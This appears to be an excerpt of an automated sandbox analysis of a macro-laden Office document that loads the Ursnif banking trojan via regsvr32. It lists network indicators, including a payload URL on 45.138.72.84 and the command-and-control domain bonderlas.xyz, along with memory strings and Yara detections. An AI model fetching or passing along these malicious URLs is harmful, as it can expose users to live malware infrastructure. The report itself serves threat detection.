            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: global trafficHTTP traffic detected: GET /10.11nov322.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.138.72.84Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /10.11nov322.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.138.72.84Connection: Keep-Alive
            Source: msapplication.xml0.5.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x2ca85b4a,0x01d6b9be</date><accdate>0x2ca85b4a,0x01d6b9be</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml0.5.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x2ca85b4a,0x01d6b9be</date><accdate>0x2ca85b4a,0x01d6b9be</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml5.5.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x2cad2001,0x01d6b9be</date><accdate>0x2cad2001,0x01d6b9be</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml5.5.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x2cad2001,0x01d6b9be</date><accdate>0x2cad2001,0x01d6b9be</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml7.5.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x2cad2001,0x01d6b9be</date><accdate>0x2cad2001,0x01d6b9be</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: msapplication.xml7.5.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x2cad2001,0x01d6b9be</date><accdate>0x2caf8257,0x01d6b9be</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: msapplication.xml0.5.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x2ca85b4a,0x01d6b9be</date><accdate>0x2ca85b4a,0x01d6b9be</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml0.5.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x2ca85b4a,0x01d6b9be</date><accdate>0x2ca85b4a,0x01d6b9be</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml5.5.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x2cad2001,0x01d6b9be</date><accdate>0x2cad2001,0x01d6b9be</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml5.5.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x2cad2001,0x01d6b9be</date><accdate>0x2cad2001,0x01d6b9be</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml7.5.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x2cad2001,0x01d6b9be</date><accdate>0x2cad2001,0x01d6b9be</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: msapplication.xml7.5.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x2cad2001,0x01d6b9be</date><accdate>0x2caf8257,0x01d6b9be</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: unknownDNS traffic detected: queries for: bonderlas.xyz
            Source: unknownDNS traffic detected: queries for: bonderlas.xyz
            Source: regsvr32.exe, 00000001.00000003.668415771.0000000005AA0000.00000004.00000040.sdmpString found in binary or memory: http://%s=%s&file://&os=%u.%u_%u_%u_x%uindex.html;
            Source: sharedStrings.binString found in binary or memory: http://45.138.72.84/10.11nov322.gif
            Source: regsvr32.exe, 00000001.00000002.932236505.0000000002747000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
            Source: regsvr32.exe, 00000001.00000002.932236505.0000000002747000.00000004.00000001.sdmpString found in binary or memory: http://cert.int-x3.letsencrypt.org/0
            Source: regsvr32.exe, 00000001.00000002.932236505.0000000002747000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
            Source: regsvr32.exe, 00000001.00000002.932236505.0000000002747000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
            Source: regsvr32.exe, 00000001.00000002.932236505.0000000002747000.00000004.00000001.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
            Source: Dori.ocx.0.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
            Source: Dori.ocx.0.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
            Source: regsvr32.exe, 00000001.00000002.932236505.0000000002747000.00000004.00000001.sdmpString found in binary or memory: http://isrg.trustid.ocsp.identrust.com0;
            Source: regsvr32.exe, 00000001.00000002.932236505.0000000002747000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.int-x3.letsencrypt.org0/
            Source: Dori.ocx.0.drString found in binary or memory: http://ocsp.sectigo.com0
            Source: msapplication.xml.5.drString found in binary or memory: http://www.amazon.com/
            Source: msapplication.xml1.5.drString found in binary or memory: http://www.google.com/
            Source: msapplication.xml2.5.drString found in binary or memory: http://www.live.com/
            Source: msapplication.xml3.5.drString found in binary or memory: http://www.nytimes.com/
            Source: msapplication.xml4.5.drString found in binary or memory: http://www.reddit.com/
            Source: msapplication.xml5.5.drString found in binary or memory: http://www.twitter.com/
            Source: msapplication.xml6.5.drString found in binary or memory: http://www.wikipedia.com/
            Source: msapplication.xml7.5.drString found in binary or memory: http://www.youtube.com/
            Source: regsvr32.exe, regsvr32.exe, 00000001.00000003.668415771.0000000005AA0000.00000004.00000040.sdmpString found in binary or memory: https://bonderlas.xyz
            Source: regsvr32.exe, 00000001.00000003.906109706.000000000272E000.00000004.00000001.sdmp, regsvr32.exe, 00000001.00000003.757764964.0000000002747000.00000004.00000001.sdmpString found in binary or memory: https://bonderlas.xyz/
            Source: regsvr32.exe, 00000001.00000003.792943006.0000000002747000.00000004.00000001.sdmpString found in binary or memory: https://bonderlas.xyz/U
            Source: regsvr32.exe, 00000001.00000003.822159102.0000000002709000.00000004.00000001.sdmp, regsvr32.exe, 00000001.00000002.932139128.00000000026DA000.00000004.00000020.sdmp, ~DF275CD125B53CA979.TMP.14.drString found in binary or memory: https://bonderlas.xyz/index.htm
            Source: regsvr32.exe, 00000001.00000003.822159102.0000000002709000.00000004.00000001.sdmpString found in binary or memory: https://bonderlas.xyz/index.htm19j%
            Source: {847E0F0B-25B1-11EB-90EB-ECF4BBEA1588}.dat.12.drString found in binary or memory: https://bonderlas.xyz/index.htmRoot
            Source: regsvr32.exe, 00000001.00000002.932139128.00000000026DA000.00000004.00000020.sdmpString found in binary or memory: https://bonderlas.xyz/index.htma;
            Source: regsvr32.exe, 00000001.00000003.822159102.0000000002709000.00000004.00000001.sdmpString found in binary or memory: https://bonderlas.xyz/index.htmh
            Source: {847E0F0B-25B1-11EB-90EB-ECF4BBEA1588}.dat.12.drString found in binary or memory: https://bonderlas.xyz/index.htmindex.htm
            Source: regsvr32.exe, 00000001.00000002.932139128.00000000026DA000.00000004.00000020.sdmpString found in binary or memory: https://bonderlas.xyz/index.htmne
            Source: regsvr32.exe, 00000001.00000003.822159102.0000000002709000.00000004.00000001.sdmpString found in binary or memory: https://bonderlas.xyz/index.htmr=
            Source: Dori.ocx.0.drString found in binary or memory: https://sectigo.com/CPS0
            Source: regsvr32.exe, 00000001.00000003.668415771.0000000005AA0000.00000004.00000040.sdmpString found in binary or memory: http://%s=%s&file://&os=%u.%u_%u_%u_x%uindex.html;
            Source: sharedStrings.binString found in binary or memory: http://45.138.72.84/10.11nov322.gif
            Source: regsvr32.exe, 00000001.00000002.932236505.0000000002747000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
            Source: regsvr32.exe, 00000001.00000002.932236505.0000000002747000.00000004.00000001.sdmpString found in binary or memory: http://cert.int-x3.letsencrypt.org/0
            Source: regsvr32.exe, 00000001.00000002.932236505.0000000002747000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
            Source: regsvr32.exe, 00000001.00000002.932236505.0000000002747000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
            Source: regsvr32.exe, 00000001.00000002.932236505.0000000002747000.00000004.00000001.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
            Source: Dori.ocx.0.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
            Source: Dori.ocx.0.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
            Source: regsvr32.exe, 00000001.00000002.932236505.0000000002747000.00000004.00000001.sdmpString found in binary or memory: http://isrg.trustid.ocsp.identrust.com0;
            Source: regsvr32.exe, 00000001.00000002.932236505.0000000002747000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.int-x3.letsencrypt.org0/
            Source: Dori.ocx.0.drString found in binary or memory: http://ocsp.sectigo.com0
            Source: msapplication.xml.5.drString found in binary or memory: http://www.amazon.com/
            Source: msapplication.xml1.5.drString found in binary or memory: http://www.google.com/
            Source: msapplication.xml2.5.drString found in binary or memory: http://www.live.com/
            Source: msapplication.xml3.5.drString found in binary or memory: http://www.nytimes.com/
            Source: msapplication.xml4.5.drString found in binary or memory: http://www.reddit.com/
            Source: msapplication.xml5.5.drString found in binary or memory: http://www.twitter.com/
            Source: msapplication.xml6.5.drString found in binary or memory: http://www.wikipedia.com/
            Source: msapplication.xml7.5.drString found in binary or memory: http://www.youtube.com/
            Source: regsvr32.exe, regsvr32.exe, 00000001.00000003.668415771.0000000005AA0000.00000004.00000040.sdmpString found in binary or memory: https://bonderlas.xyz
            Source: regsvr32.exe, 00000001.00000003.906109706.000000000272E000.00000004.00000001.sdmp, regsvr32.exe, 00000001.00000003.757764964.0000000002747000.00000004.00000001.sdmpString found in binary or memory: https://bonderlas.xyz/
            Source: regsvr32.exe, 00000001.00000003.792943006.0000000002747000.00000004.00000001.sdmpString found in binary or memory: https://bonderlas.xyz/U
            Source: regsvr32.exe, 00000001.00000003.822159102.0000000002709000.00000004.00000001.sdmp, regsvr32.exe, 00000001.00000002.932139128.00000000026DA000.00000004.00000020.sdmp, ~DF275CD125B53CA979.TMP.14.drString found in binary or memory: https://bonderlas.xyz/index.htm
            Source: regsvr32.exe, 00000001.00000003.822159102.0000000002709000.00000004.00000001.sdmpString found in binary or memory: https://bonderlas.xyz/index.htm19j%
            Source: {847E0F0B-25B1-11EB-90EB-ECF4BBEA1588}.dat.12.drString found in binary or memory: https://bonderlas.xyz/index.htmRoot
            Source: regsvr32.exe, 00000001.00000002.932139128.00000000026DA000.00000004.00000020.sdmpString found in binary or memory: https://bonderlas.xyz/index.htma;
            Source: regsvr32.exe, 00000001.00000003.822159102.0000000002709000.00000004.00000001.sdmpString found in binary or memory: https://bonderlas.xyz/index.htmh
            Source: {847E0F0B-25B1-11EB-90EB-ECF4BBEA1588}.dat.12.drString found in binary or memory: https://bonderlas.xyz/index.htmindex.htm
            Source: regsvr32.exe, 00000001.00000002.932139128.00000000026DA000.00000004.00000020.sdmpString found in binary or memory: https://bonderlas.xyz/index.htmne
            Source: regsvr32.exe, 00000001.00000003.822159102.0000000002709000.00000004.00000001.sdmpString found in binary or memory: https://bonderlas.xyz/index.htmr=
            Source: Dori.ocx.0.drString found in binary or memory: https://sectigo.com/CPS0
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.667994704.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668473808.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668884278.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668415771.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668296205.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.667535091.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.667824445.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668952879.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.667736217.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.667639814.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668760618.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668844490.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668083281.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668527386.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668803877.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.669148269.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668230712.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.669122907.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.669084633.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668920606.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.667912734.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.669040349.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.667438738.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.669062801.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.669138033.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.669012249.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.932781395.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668636640.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668166944.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.669108055.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668584629.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668358027.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668983216.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 1620, type: MEMORY

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.667994704.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668473808.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668884278.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668415771.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668296205.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.667535091.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.667824445.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668952879.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.667736217.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.667639814.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668760618.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668844490.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668083281.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668527386.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668803877.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.669148269.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668230712.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.669122907.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.669084633.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668920606.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.667912734.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.669040349.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.667438738.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.669062801.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.669138033.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.669012249.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.932781395.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668636640.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668166944.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.669108055.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668584629.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668358027.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.668983216.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 1620, type: MEMORY

            System Summary:

            barindex
            Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
